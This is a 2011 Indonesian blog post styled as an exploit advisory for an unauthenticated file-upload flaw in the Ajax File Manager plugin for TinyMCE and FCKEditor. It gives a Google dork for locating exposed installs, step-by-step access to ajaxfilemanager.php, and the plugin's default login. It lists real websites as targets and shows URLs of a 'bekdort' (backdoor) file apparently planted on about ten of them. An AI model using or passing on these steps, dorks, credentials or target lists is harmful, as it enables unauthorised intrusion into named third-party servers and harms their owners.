.: Dee Personal Blog :.

Subtitle

Blog

Ajax File Manager File Upload Vulnerability By : X-Cisadane

Posted on November 6, 2011 at 2:45 AM

=========================================================================

Ajax File Manager File Upload Vulnerability

=========================================================================

 

:-------------------------------------------------------------------------------------------------------------------------:

: # Exploit Title : Ajax File Manager File Upload Vulnerability

: # Date : 06 November 2011

: # Author : X-Cisadane

: # Software Link : http://www.phpletter.com

: # Version : All

: # Category : Web Applications

: # Vulnerability : File Upload Vulnerability

: # Tested On : Google Chrome 14.0.835 (Windows)

: # Dorks : inurl:/plugins/ajaxfilemanager/

: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari

:-------------------------------------------------------------------------------------------------------------------------:


 

Ajax File Manager adalah sebuah Plug-ins yang dapat anda tambahkan di FCKEditor/TinyMCE yang berfungsi untuk manejemenisasi berkas, misalnya : pengunggahan berkas (text, image, html, dll), pembuatan Folder, penghapusan, pemidahan, penyalinan berkas maupun folder, biasanya digunakan pada CMS. Berkas yang dapat diunggah tergantung pada konfigurasi dari Website itu sendiri. Beberapa Ajax File Manager ada yang tidak memerlukan halaman Login, sehingga kita bisa bebas melihat isi Folder/berkas pada Ajax File Manager maupun melakukan operasi lainnya.

 


POC :

[1] Buka Google, Ketik Dorknya : inurl:/plugins/ajaxfilemanager/

[2] Contoh, Website yang akan dicobai :

#TinyMCE

http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/

Ubah URL pada browser menjadi : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

 

#FCKEditor

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/

Ubah URL pada browser menjadi : http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php

 

[3] Jika tidak dihadang Login Form kita bisa langsung menuju File Manager dan melakukan Upload File maupun membuat Folder baru.


 

Seperti ini :

http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php

http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php

http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


 

Hasil :

http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/dwi/bekdort.txt

http://www.thebradshawscornershop.co.uk/images/dwi/bekdort.txt

http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/dwi/bekdort.txt

http://202.137.23.162/brantas_portal/uploaded_docimage/dwi/bekdort.txt

http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/dwi/bekdort.txt

http://www.everwiseband.com/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/up/dwi/bekdort.txt

http://www.thealami.com/upfile/dwi/bekdort.txt

http://www.fasterp.com/joomla/images/dwi/bekdort.txt

http://www.emsindia.in/admin/texteditor/uploaded/dwi/bekdort.txt

http://www.auroracollectibles.com/assets/images/banner/bekdort.txt

 


P.S : Default Password Ajax File Manager (Mungkin masih ada Website yang menggunakan Password Default).

Username:ajax

Password:123456

Categories: Exploit

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

You must be a member to comment on this page. Sign In or Register

0 Comments